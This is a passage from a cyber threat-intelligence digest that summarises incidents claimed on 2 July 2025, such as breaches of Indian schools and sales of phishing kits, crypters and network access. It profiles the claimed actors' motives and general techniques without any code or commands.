  • Motivations: The primary motivation for “GARUDA ERROR SYSTEM” is hacktivism and retaliation within an ongoing cyber conflict between Indonesian and Indian hacktivist groups.17 The targeting of Indian educational institutions, such as Nirmal Haloi College, aligns with their declared intent to attack “Indian infrastructure” as part of their “OpIndia2.0” campaign.17
  • Key TTPs: Their activities predominantly include data theft and defacement of websites.17 The consistent targeting of Indian educational institutions for data breaches, as seen in this and subsequent incidents, demonstrates a focused campaign to disrupt and exfiltrate information from specific sectors in India.
  • Source Links:

19. Alleged data breach of Himalaya Public Senior Secondary School

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:19:19Z
  • Victim: Himalaya Public Senior Secondary School (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: Consistent with their observed pattern, the “GARUDA ERROR SYSTEM” group claims to have leaked data from Himalaya Public Senior Secondary School, another educational institution in India. This further solidifies their ongoing targeted campaign against the Indian education sector. The nature of the leaked data, while not explicitly detailed for this specific incident, is likely similar to academic records, posing risks of privacy compromise and potential misuse.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • The profile, motivations, and TTPs for “GARUDA ERROR SYSTEM” are consistent with those detailed in Incident 18. This group is likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda,” primarily driven by hacktivism and retaliation against Indian entities.17 Their repeated targeting of Indian educational institutions underscores a focused effort within their cyber conflict.
  • Source Links:

20. Alleged data breach of Budding Brains International School (BBIS)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:17:10Z
  • Victim: Budding Brains International School (BBIS) (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: This marks the third consecutive incident where “GARUDA ERROR SYSTEM” claims a data breach of an Indian educational institution, specifically Budding Brains International School (BBIS). This persistent targeting strongly confirms a deliberate and focused campaign by the group against India’s education sector, likely as part of their broader hacktivist agenda. The repeated nature of these attacks suggests either a common vulnerability exploited across these institutions or a sustained effort to compromise multiple targets within the sector.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • The profile, motivations, and TTPs for “GARUDA ERROR SYSTEM” remain consistent with those detailed in Incident 18. Their continued targeting of Indian educational institutions, as seen in this and the preceding incidents, reinforces their role as an Indonesian hacktivist group engaged in retaliatory cyberattacks against India.17
  • Source Links:

21. Alleged Sale of Advanced Evilginx3 Variant

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T11:15:41Z
  • Victim: General users/organizations vulnerable to advanced phishing
  • Threat Actor: maverickslab
  • Incident Description: The threat actor “maverickslab” claims to be selling an advanced version of Evilginx3, a well-known phishing framework, customized to bypass Cloudflare and BotGuard protections. The toolkit boasts features such as DOM-tampering, fingerprint mitigation, Google BotGuard evasion, fully automated proxy rotation, and the creation of high-conversion phishing lure pages, where each visitor sees a unique proxy and phishing portal. The package includes a pre-configured Evilginx3 setup, a rotation engine, support, and free updates for 30 days. This tool represents a significant advancement in phishing capabilities, making it substantially harder for both users and automated security systems to detect and mitigate sophisticated phishing attacks.
  • Threat Actor Profile: maverickslab
  • No specific information about “maverickslab” is available in the provided research material. This suggests that “maverickslab” is either a new or less publicly documented individual threat actor specializing in the development and sale of sophisticated phishing tools.
  • Motivations: The primary motivation is financial gain through the sale of this advanced phishing toolkit to other cybercriminals. By offering a tool that bypasses common security defenses and enhances the realism of phishing lures, “maverickslab” enables a wider range of malicious actors to conduct more successful and evasive credential harvesting and social engineering campaigns.
  • TTPs: This actor focuses on developing and distributing tools that directly counter modern security defenses, such as Web Application Firewalls (WAFs) and bot detection mechanisms (e.g., Cloudflare, BotGuard, Google BotGuard). The technical features like DOM-tampering, fingerprint mitigation, and automated proxy rotation indicate a deep understanding of anti-phishing technologies and network obfuscation. The emphasis on “high-conversion phishing lure pages” highlights a focus on maximizing the success rate of credential theft, which is a critical initial access vector for many subsequent attacks.
  • Source Links:

22. Alleged sale of unauthorized access to an WordPress based online store from Ireland

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T11:14:05Z
  • Victim: Unidentified WordPress-based online store (E-commerce & Online Stores, Ireland)
  • Threat Actor: Yudgin
  • Incident Description: The threat actor “Yudgin” claims to be selling unauthorized admin access to an Irish WordPress-based online store. The listing specifies that the site features Stripe iframe payment integration and has 1,085 registered users with an average transaction value of 87 Euros. Gaining admin access to an e-commerce platform can lead to various malicious activities, including data theft (customer PII and payment information), payment redirection (diverting funds from legitimate transactions), website defacement, or the injection of malicious code for supply chain attacks.
  • Threat Actor Profile: Yudgin
  • No specific information about “Yudgin” is available in the provided research material. This suggests that “Yudgin” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of compromised e-commerce access clearly indicates that the primary motivation is financial gain. The detailed mention of registered users and average transaction value suggests the actor is marketing the access based on its potential for direct financial exploitation.
  • TTPs: Gaining admin access to a WordPress-based site typically involves exploiting common WordPress vulnerabilities (e.g., outdated plugins/themes, known CVEs), brute-forcing weak admin credentials, or leveraging misconfigurations. The presence of Stripe iframe payment integration means that while direct payment processing might be handled externally, the admin access could still allow for manipulation of order details, customer information, or redirection logic.
  • Source Links:

23. Alleged data breach of Operation PAR, Inc.

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:46:55Z
  • Victim: Operation PAR, Inc. (Non-profit & Social Organizations, USA)
  • Threat Actor: Worldleaks
  • Incident Description: The “Worldleaks” group claims to have breached Operation PAR, Inc., a non-profit and social organization in the USA, and exfiltrated a significant volume of data: 485.2 GB, including 898,100 files. The sheer size of the compromised data suggests a comprehensive compromise of internal documents, client records, and operational files. For a non-profit, this could include sensitive client information, donor data, and internal operational strategies, posing risks to privacy, reputation, and continued service delivery.
  • Threat Actor Profile: Worldleaks
  • “Worldleaks” is a new extortion platform that emerged in early 2025, specifically launched on January 1, 2025, by the operators of the Hunters International ransomware group.18
  • History & Profile: This platform represents a strategic shift from a double extortion model (which involved ransomware deployment) to an extortion-only approach. This shift was reportedly driven by increased risks and reduced profitability within the traditional ransomware ecosystem.18 Despite this strategic pivot, the parent group, Hunters International, remains active and has continued to claim victims, with over 70 reported since the shift was announced.18 Worldleaks functions as an
    Extortion-as-a-Service (EaaS) platform, providing affiliates with an exfiltration tool to facilitate their operations.18 They are also known to collaborate with other ransomware groups, such as Secp0.18
  • Motivations: The primary motivation for “Worldleaks” is financial gain through extortion, leveraging the exfiltrated data as leverage against victims.18 The large volume of data exfiltrated from Operation PAR, Inc. is consistent with their EaaS model, which aims to maximize extortion potential by demonstrating significant compromise.
  • Key TTPs:
  • Data Exfiltration: Worldleaks provides its affiliates with specialized tools designed for efficient data exfiltration.18
  • Extortion Operations: They operate multiple platforms to facilitate their extortion activities: a main data leak site (referred to as a “trophy wall” where victims’ data is displayed), a negotiation site for ransom payments, and an “Insider platform” designed for journalists to publicize breaches and increase pressure on victims.18 They employ selective exposure of sensitive files to escalate psychological pressure on the victim organization.18
  • Hybrid Approach: While Worldleaks claims to be an extortion-only project, investigations have confirmed that some of its claimed victims have still experienced ransomware deployment on their systems. This indicates a flexible or collaborative approach where ransomware may still be utilized, perhaps through their affiliates.18
  • Infrastructure: The Worldleaks platform shares numerous similarities in design, layout, and functionality with the Hunters International platform, suggesting the use of shared underlying frameworks and operational infrastructure.18
  • Source Links:

24. Alleged data breach of TVheadend

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:44:50Z
  • Victim: TVheadend TV streaming server (Entertainment & Movie Production, Iran)
  • Threat Actor: Sword of Ali
  • Incident Description: The threat actor “Sword of Ali” claims to have breached the TVheadend TV streaming server and, notably, completely deleted its database. This is a destructive attack, going beyond mere data theft to cause significant operational disruption and data loss. The targeting of an Iranian entity, coupled with the destructive nature of the attack, suggests motivations beyond simple financial gain, possibly related to hacktivism, geopolitical objectives, or internal disruption.
  • Threat Actor Profile: Sword of Ali (Potential Iran-aligned group)
  • While “Sword of Ali” is not directly named in the provided research, the targeting of an Iranian entity and the name itself (evoking “Ali Baba” and a reference to “The Sword of Ali Baba” in a Wikipedia snippet 19) suggest a potential link to
    Iran-aligned hacking groups. The profile of BladedFeline (an Iran-aligned group, assessed as a sub-cluster within OilRig, a known Iranian nation-state cyber actor) is highly relevant here.20 OilRig is linked to Iran’s Ministry of Intelligence and Security (MOIS).21
  • History & Profile (BladedFeline/OilRig context): BladedFeline has been active since September 2017, primarily targeting government officials and telecommunication providers in the Kurdistan Region of Iraq (KRG), Iraq, and Uzbekistan.20 They were first documented by ESET in May 2024 and have been observed orchestrating attacks against Iran’s neighbors.20
  • Motivations: If “Sword of Ali” is indeed an Iran-aligned group, the motivation for targeting an Iranian entity like TVheadend could be complex:
  • False Flag Operation: To mislead attribution and divert attention from the true perpetrators or their state sponsors.
  • Internal Disruption or Control: To disrupt services or gain control for internal political reasons, perhaps to silence dissent or demonstrate authority.
  • Demonstration of Capability: To showcase their destructive capabilities to a specific audience or to other threat actors.
  • Hacktivism: If the actor is a non-state entity, the motivation could be ideological, aiming to make a statement against the target or its associated entities.
  • Cyber Espionage: BladedFeline’s motivations include cyber espionage, maintaining strategic access, gathering diplomatic and financial information, and countering Western influence.20 A destructive attack could be a cover for deeper intelligence gathering or a punitive measure.
  • Key TTPs (BladedFeline/OilRig context): These groups are known for malware development, creating custom backdoors like Shahmaran, Whisper (Veaty), Spearal, Optimizer, Slippery Snakelet, and Hawking Listener.20 They utilize various
    tunneling tools such as Laret and Pinar to maintain access.20 They also employ
    malicious IIS modules like PrimeCache, which bears similarities to OilRig’s RDAT backdoor.20 Initial access often involves suspected exploitation of internet-facing application vulnerabilities and social engineering efforts.20 The complete deletion of a database indicates a destructive capability consistent with advanced threat actors.
  • Source Links:

25. LulzSec Resitance targets the website of Sai Computer School Patna

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T10:30:14Z
  • Victim: Sai Computer School Patna (Education, India)
  • Threat Actor: LulzSec Resitance
  • Incident Description: The “LulzSec Resitance” group claims to have defaced the website of Sai Computer School Patna, an educational institution in India. Website defacement is a hallmark tactic of hacktivist groups, used to publicly broadcast their presence, convey a message, or simply demonstrate their ability to compromise targets.
  • Threat Actor Profile: LulzSec Resitance (LulzSec Offshoot)
  • “LulzSec Resitance” is clearly an offshoot or a group heavily inspired by the original LulzSec group.4 The original LulzSec (May-June 2011) was a grey hat hacking group affiliated with Anonymous and AntiSec, known for high-profile attacks and sarcastic post-attack messages.4
  • Motivations: Similar to the original LulzSec, the motivation for “LulzSec Resitance” is likely a combination of “lulz” (causing mayhem for entertainment), exposing insecure systems, and potentially political messaging.5 The targeting of an Indian educational institution could be part of a broader hacktivist campaign, potentially related to the ongoing cyber conflict between Indonesian and Indian hacktivist groups, as observed with “GARUDA ERROR SYSTEM.” This suggests a coordinated or ideologically aligned effort to impact Indian digital infrastructure.
  • Key TTPs: Defacement is a core tactic of LulzSec and its various affiliates.4 Their historical methods also included Denial of Service attacks, data theft, and hijacking accounts, which could be precursors or follow-ups to defacement activities.
  • Source Links:

26. Alleged sale of access to Tunisian Post Office Server

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T10:28:56Z
  • Victim: The Tunisian Post Office (Financial Services, Tunisia)
  • Threat Actor: mecrobyte
  • Incident Description: The threat actor “mecrobyte” claims to be selling root access to a server belonging to the Tunisian Post Office, a financial services entity in Tunisia. Root access grants the highest level of control over a server, enabling an attacker to modify system configurations, install malware, exfiltrate any data stored on the server, or use it as a pivot point for further attacks within the organization’s network. This is a critical compromise for a financial institution, with potential implications for customer data, financial transactions, and operational integrity.
  • Threat Actor Profile: mecrobyte
  • No specific information about “mecrobyte” is available in the provided research material. This suggests that “mecrobyte” is either a new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: The explicit “sale” of root access clearly indicates that the primary motivation is financial gain. The targeting of a financial services institution like the Tunisian Post Office suggests an interest in high-value targets that can yield significant profit through the sale of access or subsequent data exfiltration. “mecrobyte” was also observed selling admin access to OwlCom, reinforcing this focus on monetizing compromised access.
  • TTPs: Obtaining root access to a server typically requires exploiting severe vulnerabilities in network services, operating systems, or applications running on the server. It could also involve successful social engineering to acquire administrative credentials, or the exploitation of misconfigured systems. The ability to gain root access implies a high level of technical proficiency in penetration testing or vulnerability exploitation.
  • Source Links:

27. Alleged data sale of Bank of India

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T10:21:42Z
  • Victim: Bank of India (Banking & Mortgage, India)
  • Threat Actor: Market Exchange
  • Incident Description: A threat actor, identified as “Market Exchange,” claims to have leaked data from Bank of India salary accounts, exposing over 850,000 valid cardholder records. The data, reportedly extracted on June 30, 2025, includes updated salary account information such as first and last names, mobile numbers, email addresses, and account types. This constitutes a significant data breach for a major financial institution, posing severe risks of financial fraud, identity theft, and targeted phishing campaigns against a large number of individuals.
  • Threat Actor Profile: Market Exchange
  • “Market Exchange” is likely a reference to a darknet marketplace or an actor operating within such a market, rather than a specific hacking group.22 Darknet markets are commercial websites on the dark web that facilitate the sale of illicit goods, including stolen data.22
  • Motivations: The explicit “sale” of data from a bank clearly indicates that the primary motivation is financial gain. The value of stolen financial data, especially cardholder records and salary account information, is high on underground markets.
  • Key TTPs (Darknet Market Context): While “Market Exchange” itself is likely a platform or vendor, the underlying breach would have involved specific TTPs to compromise the Bank of India. Darknet markets operate via anonymized access (typically Tor), use cryptocurrencies (Bitcoin, Monero) with escrow services, and feature vendor feedback systems.22 The sale of stolen data on these platforms involves a process where buyers transfer cryptocurrency into escrow, and vendors dispatch goods (data) before payment is released.22 The incident highlights how such markets enable the monetization of large-scale data breaches.
  • Source Links:

28. Alleged leak of Pegasus Spyware

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T10:16:32Z
  • Threat Actor: APT IRGC
  • Incident Description: The threat actor “APT IRGC” claims to have leaked details on Pegasus spyware, showcasing how zero-click vulnerabilities were exploited to infiltrate devices without user interaction. The actor asserts that the tool enabled full remote control over target phones by leveraging advanced in-memory exploitation techniques to bypass user defenses and gain persistent access. If true, this leak could provide critical intelligence on sophisticated state-sponsored surveillance capabilities, potentially enabling other actors to develop similar tools or defenses.
  • Threat Actor Profile: APT IRGC (Iranian State-Sponsored Cyber Groups)
  • “APT IRGC” directly refers to an Advanced Persistent Threat (APT) group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC).21 The IRGC is one of the most powerful and feared organizations in Iran, playing central roles in the country’s projection of power, internal security, and economy, reporting directly to the Supreme Leader.24 The IRGC operates Iran’s ballistic missile arsenal and oversees the Quds Force, an expeditionary arm that partners with Iran’s various regional affiliates.24 They also have a cyber command that works with IRGC-affiliated businesses on military and commercial espionage, as well as propaganda distribution.24
  • History & Profile: Iranian state-sponsored hacking groups linked to the IRGC have a long history of orchestrating social engineering attacks using elaborate lures, often approaching targets on platforms like Facebook and LinkedIn with fictitious personas to deploy malware.25 Notable groups include Magic Hound (APT35, Charming Kitten, Cobalt Illusion), APT33 (Elfin, Magnallium), OilRig (APT34, Helix Kitten, Chrysene), and APT42.21
  • Motivations: Iranian APT groups, particularly those linked to the IRGC, are primarily motivated by cyber espionage, intelligence gathering, and political objectives.21 They target journalists, researchers, human rights activists, government officials, and those critical of the Iranian regime.21 The alleged leak of Pegasus spyware details could be motivated by:
  • Disinformation/Propaganda: To spread specific narratives or sow distrust.
  • Demonstration of Capability: To showcase their ability to acquire highly sensitive intelligence on advanced surveillance tools.
  • Intelligence Sharing/Sales: While less common for state-sponsored groups to openly “leak” such tools, it could be a controlled release to specific allies or for a highly valuable sale on a private market.
  • Key TTPs: These groups are known for aggressive spear-phishing campaigns, rapid setup of domains and infrastructure, and fast-paced takedowns when identified.25 They exploit software vulnerabilities and use cloud platforms for command-and-control infrastructure.21 Their attacks often leverage geopolitical tensions to coax victims into deploying malware.25 The alleged leak of Pegasus details implies a successful compromise of a highly sensitive target with access to such information, potentially through sophisticated zero-day exploits or supply chain attacks.
  • Source Links:

29. Alleged leak of access credentials to Highway Police Division Thailand

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:52:34Z
  • Victim: Highway Police Division Thailand (Government Administration, Thailand)
  • Threat Actor: H3C4KEDZ
  • Incident Description: The “H3C4KEDZ” group claims to have gained unauthorized access to the Highway Police Division Thailand. Gaining initial access to a government administration entity, especially law enforcement, is a critical compromise. It could enable further data exfiltration (e.g., sensitive operational data, personal information of officers or citizens), system disruption, or the planting of backdoors for long-term espionage.
  • Threat Actor Profile: H3C4KEDZ (Hellcat Hacking Group)
  • H3C4KEDZ is associated with the Hellcat Hacking Group, which emerged in late 2024.3 The group is led by
    Rey and Pryx, known for high-profile attacks on major corporations.3
  • Motivations: Hellcat’s motivations are a mix of notoriety, financial gain, and hacktivism.3 Rey, identifying as a “Palestinian hacker,” and Pryx, known for offensive statements, use their activities to publicize their presence and potentially make political statements.3 Targeting a government entity like the Highway Police aligns with hacktivist motivations to disrupt or expose state operations, or to demonstrate capability for future financial exploitation.
  • Key TTPs: Rey’s operations frequently involve exploiting Jira credentials for access.3 Pryx developed a “unique server-side stealer” using Tor for data exfiltration.3 They are involved in data breaches and leaks, and sell malware.3 Their aggressive online presence on Telegram and X (Twitter) is used to share leaks and publicize operations.3 Gaining initial access to a government network suggests sophisticated techniques, potentially involving social engineering or exploiting network perimeter vulnerabilities.
  • Source Links:

30. Alleged sale of RDP access to an unidentified Retail Company from USA

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:44:31Z
  • Victim: Unidentified U.S.-based retail organization (Retail Industry, USA)
  • Threat Actor: BenjaminFranklin
  • Incident Description: The threat actor “BenjaminFranklin” claims to be selling Remote Desktop Protocol (RDP) access to a U.S.-based retail organization. The listing advertises domain admin privileges and notes that the target is protected by Trend Micro Security Agent. RDP access with domain admin privileges provides complete control over the organization’s IT infrastructure, making it highly valuable for ransomware deployment, extensive data theft, or long-term espionage. The mention of Trend Micro suggests the attacker has found a way to bypass or disable endpoint security.
  • Threat Actor Profile: BenjaminFranklin
  • No specific information about “BenjaminFranklin” is available in the provided research material. This suggests that “BenjaminFranklin” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of RDP access with domain admin privileges clearly indicates that the primary motivation is financial gain. Access of this caliber is highly sought after on underground forums for various illicit activities, including ransomware operations.
  • TTPs: Obtaining RDP access with domain admin privileges typically involves exploiting vulnerabilities in remote access services, brute-forcing weak RDP credentials, or compromising administrative accounts through phishing or malware. The ability to bypass or operate undetected by an endpoint security solution like Trend Micro Security Agent implies a degree of sophistication in their methods, such as using living-off-the-land binaries or custom tools to evade detection.
  • Source Links:

31. Alleged data leak of ISID (Innovative Software for Image and Data)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T09:24:28Z
  • Victim: ISID (Innovative Software for Image and Data) (Software Development, Spain)
  • Threat Actor: CLOBELSECTEAM
  • Incident Description: The threat actor “CLOBELSECTEAM” claims to have leaked 77GB of data from the database of ISID (Innovative Software for Image and Data), a software development company in Spain. The large volume of data suggests a significant compromise, potentially including intellectual property, customer data, and internal operational information. For a software development firm, such a breach could expose source code, proprietary algorithms, or sensitive project details, leading to competitive disadvantage or supply chain risks.
  • Threat Actor Profile: CLOBELSECTEAM
  • While “CLOBELSECTEAM” is not directly detailed, the name “CLOBELSECTEAM” and the nature of the attack (data leak) suggest a group with a focus on data exfiltration. The provided snippets for this query mention Lapsus$.26 Lapsus$ is an international extortion-focused black-hat hacker group active since late 2021, known for various cyberattacks against companies and government agencies, with members arrested in Brazil and the UK in 2022.26
  • Motivations (Lapsus$ context): Lapsus$’s primary goal is often fame and notoriety rather than direct financial gain, though they do engage in extortion.28 They are known for being disarmingly bold, directly soliciting employees on Telegram for login credentials.28 If “CLOBELSECTEAM” shares similar motivations, the leak could be for notoriety or to pressure the victim into an extortion payment.
  • Key TTPs (Lapsus$ context): Lapsus$ uses a variety of attack vectors, including social engineering, MFA fatigue, SIM swapping, and targeting suppliers.27 Once credentials to a privileged employee are gained, they attempt to obtain sensitive data using remote desktop tools, followed by extortion attempts.27 They do not typically use malware or custom tools in breached environments, focusing more on social engineering and stolen credentials.28 The 77GB data leak from ISID suggests a successful credential-based infiltration or exploitation of a significant vulnerability.
  • Source Links:

32. Alleged leak of access credentials to District Municipality and Villa of Yarabamba

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:24:16Z
  • Victim: District Municipality and Villa of Yarabamba (Government Administration, Peru)
  • Threat Actor: AndesCrypto
  • Incident Description: The threat actor “AndesCrypto” claims to have leaked free access credentials for the District Municipality and Villa of Yarabamba, a government administration entity in Peru. The public release of access credentials, especially for a municipal government, poses a significant risk. It can enable unauthorized access to sensitive citizen data, disruption of public services, or further compromise of government infrastructure, potentially leading to widespread chaos or data theft.
  • Threat Actor Profile: AndesCrypto
  • No specific information about “AndesCrypto” is available in the provided research material. This suggests that “AndesCrypto” is either a new or less publicly documented individual threat actor. The name “AndesCrypto” suggests a potential connection to South America (Andes region) and cryptocurrency, possibly indicating a financially motivated actor who deals in crypto.
  • Motivations: The “free access” claim could be for notoriety, a demonstration of capability, or a means to attract attention for future financially motivated activities. While the access is offered “free,” the underlying motivation for the breach itself is likely financial, as compromised government access can be later monetized or used as leverage.
  • TTPs: The leak of access credentials implies successful credential harvesting. This could involve phishing campaigns targeting municipal employees, exploitation of weak authentication mechanisms, or brute-force attacks against exposed services. The public release of credentials is a common tactic to prove a breach and gain recognition within the hacking community.
  • Source Links:

33. Alleged data breach of Ivri,Kerner & Co

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T09:10:41Z
  • Victim: Ivri,Kerner & Co, Law Offices (Legal Services, Israel)
  • Threat Actor: Handala Hack
  • Incident Description: The “Handala Hack” group claims to have obtained 345 GB of data from Ivri,Kerner & Co, a law firm in Israel. The compromised data allegedly includes all internal files, legal documents, client communications, and confidential archives. A data breach of a legal services firm is highly sensitive, as it can expose privileged attorney-client communications, confidential case details, and extensive personal and corporate information of clients, leading to severe legal, financial, and reputational repercussions.
  • Threat Actor Profile: Handala Hack
  • “Handala Hack” is a prominent cyber threat group that emerged in late 2023.29 It is an
    Iranian-linked cyber group, potentially linked to Iran’s Ministry of Intelligence (MOIS), and is known for claiming pro-Palestinian motives.29
  • History & Profile: Handala has been one of the most active threat actor groups targeting Israeli organizations and digital infrastructure since late 2023.29 They gained attention for using Telegram and social media to publicize their operations and taunt victims.29 They claimed a major cyberattack on Israel’s national police network in February 2025, exfiltrating 2.1 terabytes of data.29 In April (previous year), they claimed to have breached Israel’s radar systems and sent threatening text messages to citizens, and in September, they alleged a breach of the Soreq Nuclear Research Center, stealing 197 GB of data and publishing photos.30
  • Motivations: Handala’s motivations are primarily hacktivism and cyber espionage, driven by pro-Palestinian and anti-Israel ideological stances.29 Their strategy blends technical skill with psychological warfare, leveraging mass communications to amplify fear and confusion.29 The targeting of an Israeli law firm, particularly one likely holding sensitive information, aligns with their objective of disrupting and gathering intelligence on Israeli entities.
  • Key TTPs: Handala has evolved from basic phishing and DDoS attacks to credential-based infiltrations, privilege escalation, and long-term persistence within victim environments.29 They utilize
    cloud storage for data exfiltration (e.g., AWS S3, Storj) and multi-channel command and control techniques.29 They also employ malware (e.g.,
    senvarservice-DC.exe) that blends into normal network traffic to evade detection.29 The large volume of data (345 GB) exfiltrated from the law firm is consistent with their established pattern of large-scale data theft from high-value targets.
  • Source Links:

34. Alleged Sale of DLL Sideloading Crypt

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T08:59:41Z
  • Victim: General users/organizations vulnerable to malware deployment
  • Threat Actor: Detools
  • Incident Description: The threat actor “Detools” claims to be selling a DLL sideloading crypt service. This service is designed to assist in malware deployment by bypassing common security protections. The crypt is advertised as capable of evading Microsoft SmartScreen, Chrome alerts, and Windows Defender. It supports both x64/x86 native and.NET builds and includes a 24-hour detection guarantee, indicating the seller’s confidence in its evasion capabilities. This tool significantly enhances the stealth and effectiveness of malware delivery, making it harder for endpoint security solutions to prevent initial infection.
  • Threat Actor Profile: Detools
  • No specific information about “Detools” is available in the provided research material. This suggests that “Detools” is either a new or less publicly documented individual threat actor specializing in developing and selling malware evasion tools.
  • Motivations: The primary motivation is financial gain through the sale of this specialized malware component. By providing a crypt service that bypasses major security products, “Detools” enables other cybercriminals to deploy their malware more effectively, thereby profiting from the broader cybercrime ecosystem.
  • TTPs: This actor focuses on developing tools that exploit vulnerabilities in how operating systems load dynamic-link libraries (DLLs) and how security software detects malicious payloads. DLL sideloading is a technique where a legitimate application is tricked into loading a malicious DLL instead of a legitimate one. The ability to bypass Microsoft SmartScreen, Chrome alerts, and Windows Defender indicates a high level of technical expertise in anti-detection techniques and a continuous effort to update the crypt to evade new security signatures.
  • Source Links:

35. Alleged Sale of Admin Access to Indian WordPress Site

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:59:18Z
  • Victim: Unidentified WordPress-based website (India)
  • Threat Actor: blackjack
  • Incident Description: The threat actor “blackjack” claims to be selling administrator access to an Indian WordPress-based website. The listing states that the compromised site includes full admin privileges and the ability to redirect transactions to PhonePe, a popular Indian payment platform. This type of access is highly valuable for financial fraud, enabling the attacker to divert payments from legitimate transactions, inject malicious code, or exfiltrate sensitive user data.
  • Threat Actor Profile: blackjack
  • No specific information about “blackjack” is available in the provided research material. This suggests that “blackjack” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of admin access and the ability to redirect payments to PhonePe clearly indicate that the primary motivation is financial gain. The focus on a payment platform suggests a direct path to monetizing the compromised access.
  • TTPs: Gaining administrator access to a WordPress site typically involves exploiting common WordPress vulnerabilities (e.g., outdated plugins, themes, or core software), brute-forcing weak admin credentials, or using phishing to compromise legitimate accounts. The ability to redirect transactions implies either direct modification of payment gateway settings within the WordPress admin panel or the injection of malicious scripts that alter payment flows.
  • Source Links:

36. Alleged data breach of Intertelecom Ukraine

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T08:25:37Z
  • Victim: Intertelecom Ukraine (Network & Telecommunications, Ukraine)
  • Threat Actor: ClayOxtymus1337
  • Incident Description: The threat actor “ClayOxtymus1337” claims to have breached Intertelecom Ukraine, a network and telecommunications provider. While the specific type of data exfiltrated is not detailed, a breach of a telecommunications company can be highly impactful, potentially exposing subscriber data (PII, call records), network infrastructure details, or enabling service disruption. Such information is valuable for espionage, targeted attacks, or further fraud.
  • Threat Actor Profile: ClayOxtymus1337
  • No specific information about “ClayOxtymus1337” is available in the provided research material. This suggests that “ClayOxtymus1337” is either a new or less publicly documented individual threat actor. The “1337” suffix often indicates a self-proclaimed elite hacker.
  • Motivations: The motivation is likely financial gain, as data breaches are typically monetized through sale on underground markets. However, given the geopolitical context of Ukraine, state-sponsored espionage or disruption cannot be entirely ruled out, even if the actor’s primary public persona is financially driven.
  • TTPs: A breach of a telecommunications provider suggests sophisticated attack methods, potentially involving exploitation of critical infrastructure vulnerabilities, supply chain attacks, or highly targeted social engineering against employees with access to sensitive systems. The scale of the breach would depend on the depth of compromise within Intertelecom’s network.
  • Source Links:

37. Alleged data sale of Truemeds

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:25:24Z
  • Victim: Truemeds (Healthcare & Pharmaceuticals, India)
  • Threat Actor: OfficialSalesMan
  • Incident Description: The threat actor “OfficialSalesMan” is selling access to Truemeds’ admin panel and claims to have breached a database containing information on 5.1 million users. The listing specifies that the compromised data includes full customer information and is accessible via a web-based interface. For a healthcare and pharmaceuticals company, this data could include sensitive medical information, prescription history, and extensive personally identifiable information (PII), posing severe risks of identity theft, medical fraud, and targeted scams against a massive user base.
  • Threat Actor Profile: OfficialSalesMan
  • No specific information about “OfficialSalesMan” is available in the provided research material. This suggests that “OfficialSalesMan” is either a new or less publicly documented individual threat actor. The alias “OfficialSalesMan” explicitly indicates a focus on monetizing compromised assets.
  • Motivations: The explicit “sale” of both admin panel access and a large customer database clearly indicates that the primary motivation is financial gain. The high volume of user records (5.1 million) suggests a lucrative target for data brokers and other cybercriminals.
  • TTPs: Gaining admin panel access and breaching a large database typically involves exploiting web application vulnerabilities (e.g., SQL injection, insecure APIs), compromising credentials through phishing or brute-force, or exploiting misconfigurations in the target’s infrastructure. The web-based interface for accessing the data implies a user-friendly system for buyers, streamlining the monetization process.
  • Source Links:

38. Alleged sale of unauthorized access to European payroll software firm

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:10:58Z
  • Victim: Unidentified European company specializing in payroll and tax software development (Software Development, Europe)
  • Threat Actor: flyatrava
  • Incident Description: A threat actor named “flyatrava” claims to be selling unauthorized access to a European company that develops payroll and tax software. The leaked access reportedly includes domain admin privileges, VPN credentials, and an untouched codebase. This is a highly critical compromise for a software development firm, particularly one dealing with sensitive financial and personal data. Domain admin access grants full control over the company’s IT infrastructure, while access to the codebase could lead to intellectual property theft, supply chain attacks (by injecting malicious code into the software), or deep insights for future exploitation.
  • Threat Actor Profile: flyatrava
  • No specific information about “flyatrava” is available in the provided research material. This suggests that “flyatrava” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of such high-value access (domain admin, VPN, codebase) clearly indicates that the primary motivation is financial gain. This type of access is extremely valuable on underground markets, especially for actors looking to conduct corporate espionage, supply chain attacks, or large-scale data exfiltration.
  • TTPs: Obtaining domain admin privileges, VPN credentials, and access to a codebase implies a sophisticated and deep compromise of the target network. This could involve exploiting critical vulnerabilities in network perimeter devices, successful social engineering campaigns against privileged employees, or the use of advanced persistent threats to establish long-term access and exfiltrate sensitive data. The ability to access an “untouched codebase” suggests a direct compromise of development or source code management systems.
  • Source Links:

39. GARUDA ERROR SYSTEM targets the website of PT Global Multi Sentosa

  • Incident Overview:
  • Category: Defacement
